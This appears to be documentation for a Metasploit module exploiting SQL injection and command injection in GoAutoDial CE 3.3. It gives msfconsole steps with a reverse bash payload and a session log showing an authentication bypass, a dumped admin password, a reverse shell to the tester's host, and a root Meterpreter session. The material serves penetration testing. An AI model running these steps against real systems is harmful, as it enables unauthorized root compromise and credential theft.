## Description

This module exploits a SQL injection flaw and a command injection flaw in GoAutoDial CE 3.3, which permit authentication bypass and a complete compromise of the underlying system with root privileges. The module also extracts the administrative user's password from the underlying database.

## Affected software

GoAutoDial 3.3 CE (32bit and 64bit) is available for download from goautodial.org. To download it, register a free account, then download the bootable ISOs. Both ISOs were used during development of this module.

http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html

Refer to: https://www.exploit-db.com/exploits/36807/

## Verification

Steps to verify that the module works:

- Start `msfconsole`
- Do `use exploit/linux/http/goautodial_3_rce_command_injection`
- Do `set payload cmd/unix/reverse_bash`
- Do `set RHOST`
- Do `set LHOST`
- Do `set LPORT`
- Wait for shell

```
msf exploit(goautodial_3_rce_command_injection) > check
[+] 192.168.0.76:443 The target is vulnerable.
msf exploit(goautodial_3_rce_command_injection) > exploit -z

[*] Started reverse TCP handler on 192.168.0.11:4444
[*] 192.168.0.76:443 - Trying SQL injection...
[+] Authentication Bypass (SQLi) was successful
[*] 192.168.0.76:443 - Dumping admin password...
[+] admin|goautodial|Admin|||Y
[*] 192.168.0.76:443 - Sending payload...waiting for connection
[*] Command shell session 7 opened (192.168.0.11:4444 -> 192.168.0.76:37338) at 2017-06-18 01:40:41 +1000
[*] Session 7 created in the background.
msf exploit(goautodial_3_rce_command_injection) > sessions -u 7
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [7]

[*] Upgrading session ID: 7
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.0.11:4433
[*] Starting the payload handler...
[*] Sending stage (797784 bytes) to 192.168.0.76
[*] Meterpreter session 8 opened (192.168.0.11:4433 -> 192.168.0.76:58124) at 2017-06-18 01:41:04 +1000
[*] Command stager progress: 100.00% (668/668 bytes)
msf exploit(goautodial_3_rce_command_injection) > sessions -i 8
[*] Starting interaction with 8...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : test
OS           : CentOS 5.10 (Linux 2.6.18-371.11.1.el5)
Architecture : x64
Meterpreter  : x86/linux
```